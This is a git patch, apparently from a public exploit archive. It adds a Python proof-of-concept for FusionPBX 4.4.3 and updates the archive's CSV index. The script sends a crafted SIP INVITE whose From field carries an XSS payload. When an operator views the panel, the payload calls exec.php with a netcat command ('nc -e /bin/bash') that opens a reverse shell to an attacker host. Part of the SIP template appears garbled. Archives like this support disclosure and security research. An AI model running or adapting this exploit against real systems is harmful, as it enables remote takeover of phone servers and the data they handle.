From 698fffff86b5a3f94e7ff8d59b14c88bdfecefaf Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 13 Jun 2019 05:01:52 +0000 Subject: [PATCH] DB: 2019-06-13 1 changes to exploits/shellcodes FusionPBX 4.4.3 - Remote Command Execution --- exploits/php/webapps/46985.py | 85 +++++++++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 86 insertions(+) create mode 100755 exploits/php/webapps/46985.py diff --git a/exploits/php/webapps/46985.py b/exploits/php/webapps/46985.py new file mode 100755 index 000000000..b883eeafd --- /dev/null +++ b/exploits/php/webapps/46985.py @@ -0,0 +1,85 @@ +# Exploit Title: FusionPBX <= 4.4.3 Command Injection RCE via XSS +# Date: 06-11-2019 +# Exploit Author: Dustin Cobb +# Vendor Homepage: https://www.fusionpbx.com +# Software Link: https://https://github.com/fusionpbx/fusionpbx +# Version: <= 4.4.3 +# Tested on: Debian 8.11 +# CVE : CVE-2019-11408 (XSS) AND CVE-2019-11409 (Command Injection RCE) + +#!/usr/bin/python +import socket, sys +from random import randint +from hashlib import md5 + +# Exploitation steps: +# +# 1. First, encode an XSS payload that will be injected into the +# “Caller ID Number” field, or “User” component of the SIP +# “From” URI. +# 2. Connect to external SIP profile port and send a SIP INVITE +# packet with XSS payload injected into the From Field. +# 3. XSS payload will fire operator panel screen (CVE-2019-11408), which +# is designed to be monitored constantly by a call center operator. +# 4. Once XSS code executes, a call is made to the exec.php script +# (CVE-2019-11409) with a reverse shell payload that connects back to +# a netcat listener on the attacker system. + + +# edit these variables to set up attack +victim_addr="10.10.10.10" +victim_host="victim-pbx1.example.com" +victim_num="12125551212" + +attacker_ip="10.10.10.20" +attacker_port=4444 + +def encode(val): + ret="" + + for c in val: + ret+="\\x%02x" % ord(c) + + return ret + +callid=md5(str(randint(0,99999999))).hexdigest() + +cmd="nc -e /bin/bash %s %d" % (attacker_ip, attacker_port) +payload="q=new XMLHttpRequest();q.open('GET','exec.php?cmd=system %s',true);q.send();" % cmd + +xss=";tag=%s +To: +Call-ID: %s +CSeq: 1 INVITE +Contact: +Max-Forwards: 70 +User-Agent: Exploit POC +Content-Type: application/sdp +Allow: INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE, MESSAGE +Content-Length: 209 + +v=0 +o=root 1204310316 1204310316 IN IP4 127.0.0.1 +s=Media Gateway +c=IN IP4 127.0.0.1 +t=0 0 +m=audio 4446 RTP/AVP 0 101 +a=rtpmap:0 PCMU/8000 +a=rtpmap:101 telephone-event/8000 +a=fmtp:101 0-16 +a=ptime:2 +a=sendrecv""" % (victim_num, victim_host, xss, callid, victim_num, victim_host, callid) + +payload=payload.replace("\n","\r\n") + +s=socket.socket() + +s.connect((victim_addr,5080)) + +print payload +print + +s.send(payload) +data=s.recv(8192) + +print data \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e83f4a5f5..de18af0ac 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -41391,3 +41391,4 @@ id,file,description,date,author,type,platform,port 46981,exploits/php/webapps/46981.txt,"WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution",2019-06-11,xulchibalraa,webapps,php,80 46982,exploits/php/webapps/46982.txt,"phpMyAdmin 4.8 - Cross-Site Request Forgery",2019-06-11,Riemann,webapps,php, 46983,exploits/jsp/webapps/46983.txt,"Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting",2019-06-11,"Valerio Brussani",webapps,jsp, +46985,exploits/php/webapps/46985.py,"FusionPBX 4.4.3 - Remote Command Execution",2019-06-12,"Dustin Cobb",webapps,php,